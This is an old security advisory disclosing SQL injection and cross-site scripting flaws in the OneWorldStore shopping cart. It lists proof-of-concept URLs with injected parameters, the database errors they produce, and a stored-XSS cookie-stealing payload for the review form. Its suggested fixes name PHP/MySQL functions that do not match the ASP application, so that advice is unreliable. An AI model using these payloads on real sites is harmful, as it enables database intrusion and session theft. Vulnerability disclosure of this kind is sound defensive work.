Dcrab 's Security Advisory [Hsc Security Group] http://www.hackerscenter.com/ [dP Security] http://digitalparadox.org/ Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah Severity: High Title: Multiple multiple sql injection/errors and xss vulnerabilities in OneWorldStore Date: 14/04/2005 Vendor: OneWorldStore Vendor Website: http://www.oneworldstore.com Summary: There are, multiple sql injection/errors and xss vulnerabilities in oneworldstore. Proof of Concept Exploits: http://example.com/owBasket/owAddItem.asp?idProduct='SQL_INJECTION SQL INJECTION ODBC driver does not support the requested properties. SELECT stock FROM Products WHERE idProduct = 'SQL_INJECTION ADODB.Recordset error '800a0e78' Operation is not allowed when the object is closed. /owBasket/owAddItem.asp, line 48 http://example.com/owListProduct.asp?bSpecials='SQL_INJECTION SQL INJECTION ODBC driver does not support the requested properties. SELECT * FROM Categories WHERE idCategory = AND Active = -1 ADODB.Recordset error '800a0e78' Operation is not allowed when the object is closed. /owListProduct.asp, line 50 http://example.com/owListProduct.asp?idCategory='SQL_INJECTION SQL INJECTION ODBC driver does not support the requested properties. SELECT * FROM Categories WHERE idCategory = ''SQL AND Active = -1 ADODB.Recordset error '800a0e78' Operation is not allowed when the object is closed. /owListProduct.asp, line 50 http://example.com/owProductDetail.asp?idproduct='SQL_INJECTION SQL INJECTION ODBC driver does not support the requested properties. SELECT * FROM products WHERE idProduct = ''SQL_INJEC AND active = -1 ADODB.Recordset error '800a0e78' Operation is not allowed when the object is closed. /owProductDetail.asp, line 647 http://example.com/owProductDetail.asp?sAction=ProductReview&idProduct='SQL_INJECTION&idCategory=40&sUserName=&sUserEmail=&sRating=1&sBody=dcrab SQL INJECTION ODBC driver does not support the requested properties. SELECT * FROM products WHERE idProduct = ''SQL_INJEC AND active = -1 ADODB.Recordset error '800a0e78' Operation is not allowed when the object is closed. /owProductDetail.asp, line 647 http://example.com/owContactUs.asp?sAction=Contact&sName=&sEmail='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&sType=None+Specified&sDescription=dcrab Pops Cookie http://example.com/owListProduct.asp?bSub='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&idCategory=64http://example.com/owListProduct.asp?bSub='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&idCategory=64 Pops Cookie http://example.com/owProductDetail.asp Submitting the review form, with someething like Name:'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Email:'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E@'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E.com Rating:5 Comment: '%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Would cause long lasting permanent XSS and steal the cookies of anyone who visited the webpage. Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems. Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah Author: These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with php.
